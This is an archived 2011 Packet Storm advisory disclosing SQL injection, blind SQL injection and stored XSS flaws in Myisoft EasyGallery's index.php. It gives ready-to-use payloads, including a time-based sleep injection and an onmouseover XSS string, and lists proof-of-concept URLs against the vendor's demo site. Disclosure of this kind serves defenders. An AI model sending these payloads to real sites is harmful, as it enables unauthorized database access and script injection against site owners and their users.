Myisoft EasyGallery Cross Site Scripting / SQL Injection

2011-09-05T00:00:00
ID PACKETSTORM:104793
Type packetstorm
Reporter Eyup CELIK
Modified 2011-09-05T00:00:00

Description

                                        
                                            `# Exploit Title: MYISOFT EasyGallery SQL Injection - Blind SQL   
Injection - Stored XSS  
# Date: 2011  
# Author: Eyup CELIK  
# Version: All Version  
# Tested on: All versions are Vulnerability  
# Web Site: www.eyupcelik.com.tr  
  
  
ISSUE  
  
SQL Injection, Blind SQL Injection and XSS can be done using the command input  
  
Vulnerable Page:  
index.php  
  
  
Example:  
index.php?do=<SQL Injection Code>&page=register&PageSection=0  
index.php?catid=<SQL Injection Code>&page=category&PageSection=0  
index.php/<XSS Code>  
index.php?Go=Go&page=search&search=<Blind SQL Injection>  
  
  
Exploit:  
index.php?catid=1'&page=category&PageSection=0  
index.php/%27onmouseover=prompt(932505)%3E  
index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1 --  
  
  
POC:  
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?catid=1'&page=category&PageSection=0  
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php/%27onmouseover=prompt(932505)%3E  
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1   
--  
  
  
  
Thanks,  
  
Eyup CELIK  
Information Technology Security Specialist  
http://www.eyupcelik.com.tr  
`